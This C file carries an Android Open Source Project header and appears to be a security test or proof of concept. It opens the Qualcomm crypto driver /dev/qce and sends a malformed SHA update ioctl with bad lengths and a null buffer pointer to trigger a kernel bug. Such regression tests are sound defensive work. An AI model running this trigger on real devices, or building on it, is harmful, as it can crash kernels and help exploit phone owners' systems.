| /** |
| * Copyright (C) 2017 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| |
| #define _GNU_SOURCE |
| #include <dirent.h> |
| #include <dlfcn.h> |
| #include <fcntl.h> |
| #include <linux/sched.h> |
| #include <pthread.h> |
| #include <sched.h> |
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <string.h> |
| #include <sys/ioctl.h> |
| #include <sys/mman.h> |
| #include <sys/resource.h> |
| #include <sys/stat.h> |
| #include <sys/syscall.h> |
| #include <sys/time.h> |
| #include <sys/types.h> |
| #include <sys/wait.h> |
| #include <unistd.h> |
| #include <unistd.h> |
| |
| void trigger_bug(void); |
| int open_driver(void); |
| |
| struct buf_info { |
| union { |
| uint32_t offset; |
| uint8_t *vaddr; |
| }; |
| uint32_t len; |
| }; |
| |
| enum qcedev_sha_alg_enum { |
| QCEDEV_ALG_SHA1 = 0, |
| QCEDEV_ALG_SHA256 = 1, |
| QCEDEV_ALG_SHA1_HMAC = 2, |
| QCEDEV_ALG_SHA256_HMAC = 3, |
| QCEDEV_ALG_AES_CMAC = 4, |
| QCEDEV_ALG_SHA_ALG_LAST |
| }; |
| #define QCEDEV_MAX_BUFFERS 16 |
| #define QCEDEV_MAX_SHA_DIGEST 32 |
| struct qcedev_sha_op_req { |
| struct buf_info data[QCEDEV_MAX_BUFFERS]; |
| uint32_t entries; |
| uint32_t data_len; |
| uint8_t digest[QCEDEV_MAX_SHA_DIGEST]; |
| uint32_t diglen; |
| uint8_t *authkey; |
| uint32_t authklen; |
| enum qcedev_sha_alg_enum alg; |
| }; |
| |
| #define QCEDEV_IOC_MAGIC 0x87 |
| #define QCEDEV_IOCTL_SHA_UPDATE_REQ \ |
| _IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req) |
| #define QCEDEV_IOCTL_SHA_INIT_REQ \ |
| _IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req) |
| |
| int g_fd = -1; |
| |
| int open_driver() { |
| char *dev_path = (char *)"/dev/qce"; |
| g_fd = open(dev_path, O_RDWR); |
| return g_fd; |
| } |
| |
| void trigger_bug() { |
| struct qcedev_sha_op_req req; |
| |
| req.entries = 1; |
| req.data_len = 0x4000; |
| |
| unsigned long *vaddr = (unsigned long *)malloc(0x1000); |
| vaddr[0] = 0; |
| vaddr[1] = (unsigned long)0xffffffffffffffff; |
| req.data[0].len = 0x4000; |
| req.data[0].vaddr = 0; |
| |
| req.diglen = 0x1000; |
| req.authklen = 16; |
| req.authkey = (uint8_t *)"111111111111111"; |
| req.alg = QCEDEV_ALG_AES_CMAC; |
| |
| ioctl(g_fd, QCEDEV_IOCTL_SHA_UPDATE_REQ, &req); |
| } |
| |
| int main(int argc, char **argv) { |
| setpriority(PRIO_PROCESS, gettid(), -19); |
| if (open_driver() < 0) { |
| return -1; |
| } |
| |
| trigger_bug(); |
| return 0; |
| } |